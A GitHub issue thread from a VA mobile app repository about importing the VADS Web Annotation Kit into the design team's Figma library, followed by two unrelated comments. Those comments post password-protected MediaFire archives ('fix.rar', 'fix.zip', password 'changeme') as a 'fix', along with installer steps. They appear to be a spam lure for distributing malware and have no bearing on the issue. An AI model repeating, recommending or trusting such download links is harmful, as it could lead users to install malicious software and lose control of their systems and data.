### ISSUE TITLE
Add VADS Annotation Kit to Mobile Team's Files / LIbraries

### ISSUE THREAD

**Issue by brea11y** [department-of-veterans-affairs/va-mobile-app#9459]
Since the VADS Web Annotation Kit is an external library hosted through the VA's Figma account, we will need to download the library, upload it to our own team's files in Figma, and publish the library. After it is published, Jessica will need to turn it on for all of our design files.

**AC:**
- [x] Download the VADS Web Annotation Kit
- [x] Upload the Figma file to the mobile team's Figma account (to the Design Resources folder)
- [x] Publish it as a library
- [x] Turn it on for all design files
- [x] Update the design team via Slack

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
